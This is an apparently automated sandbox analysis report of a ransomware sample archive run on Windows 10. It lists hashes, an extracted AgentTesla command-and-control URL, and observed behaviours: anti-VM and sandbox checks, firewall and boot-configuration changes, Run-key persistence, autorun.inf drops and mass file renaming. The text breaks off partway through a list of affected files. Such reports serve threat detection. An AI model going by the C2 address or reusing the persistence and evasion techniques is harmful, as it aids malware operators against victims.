Analysis
-
max time kernel
95s -
max time network
172s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-10-2024 21:05
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00396.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00396.7z
-
Size
29.6MB
-
MD5
852631ead84c70748b7ed10389174439
-
SHA1
f7442d849e8142853c651433bdc53953e541d49a
-
SHA256
23ca1b521834978f16a892ba84be80cbd144fed4a066b844f4ecef108372a715
-
SHA512
ae5296c514d0e76fda7eaf176dc3bd9126aedde59faecc888ccd634dcc6c50c9a2664ee3c34d0f43e08be74ed8d2443615cdd7a038093003d058d02fe9c6fbda
-
SSDEEP
786432:WKL81VrqfIp0ufCtSartVhZtlXYm4GpKh8aOL9a:Wq81V7facafhZ37xKh8zL4
Malware Config
Extracted
agenttesla
http://potentpharm.guru/siu/inc/4caa3e0bebb96f.php
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Blackmoon family
-
Detect Blackmoon payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe family_blackmoon -
Glupteba family
-
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4880-4382-0x0000000000430000-0x000000000046C000-memory.dmp family_agenttesla -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe -
Renames multiple (58) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (903) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 1616 netsh.exe 3040 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 9 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exeHEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exeHEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exeTrojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exeTrojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exeTrojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exeTrojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.execsrss.exepid process 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe 2664 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe 2668 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe 1412 Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe 5160 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5444 Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe 632 csrss.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe -
Loads dropped DLL 19 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exeTrojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exepid process 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exeTrojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WildWater = "\"C:\\Windows\\rss\\csrss.exe\"" HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iconrdb = "C:\\Users\\Admin\\AppData\\Roaming\\iconrdb.exe" Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
Processes:
Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exedescription ioc process File created C:\$Recycle.Bin\S-1-5-21-4089630652-1596403869-279772308-1000\desktop.ini Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\desktop.ini Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe -
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 5140 bcdedit.exe -
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exedescription ioc process File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_10.0.19041.1_none_3802d0d85b60df4c\autorun.inf HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\Notify.jpg" HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exepid process 5444 Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe -
Processes:
resource yara_rule behavioral1/memory/1080-5577-0x0000000000400000-0x0000000000498000-memory.dmp upx -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exedescription ioc process File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-heap-l1-1-0.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.IO.Compression.Brotli.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Diagnostics.StackTrace.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\nb-NO\tipresx.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\sl-SI\tipresx.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\System\Ole DB\sqloledb.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.ComponentModel.TypeConverter.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Windows.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.ComponentModel.EventBasedAsync.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\EnableShow.reg Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipsfin.xml Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\en-GB\tipresx.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.ObjectModel.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.SecureString.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Globalization.Extensions.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\mscordbi.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msquic.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Linq.Parallel.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Resources.Reader.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.kk-kz.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Text.Json.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\UseShow.mpg Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-math-l1-1-0.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\hwrdeush.dat Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Xml.XmlSerializer.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Reflection.Extensions.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\hwrenclm.dat Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Text.Encodings.Web.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Xml.ReaderWriter.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.Win32.Registry.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-xstate-l2-1-0.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Linq.Queryable.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Diagnostics.Tools.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\System\msadc\msdaprsr.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\7-Zip\7zG.exe Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\hwrespsh.dat Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOLoader.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Net.Primitives.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Reflection.Primitives.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.WebHeaderCollection.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Numerics.Vectors.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Transactions.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\InkDiv.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Resources.Reader.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Runtime.CompilerServices.VisualC.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.SecureString.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.de-de.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\System\ja-JP\wab32res.dll.mui Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Buffers.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\Microsoft.CSharp.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Diagnostics.TextWriterTraceListener.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Numerics.Vectors.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Runtime.Serialization.Json.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base.xml Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\clrjit.dll Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe -
Drops file in Windows directory 64 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exedescription ioc process File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-n..henabledapplication_31bf3856ad364e35_10.0.19041.1_none_2a06f47b6e35a4ff\Windows.Networking.Sockets.PushEnabledApplication.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-i..nternetcontrolpanel_31bf3856ad364e35_11.0.19041.1266_none_520c37db64df4084\r\inetcpl.cpl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_ja-jp_afb5d1f043634aff\managePermissions.aspx.ja.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_it-it_0d9052e350483924\wizardInit.ascx.it.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-ui-xaml-controls_31bf3856ad364e35_10.0.19041.1023_none_95090027c7abbbb9\Windows.UI.Xaml.Controls.dll 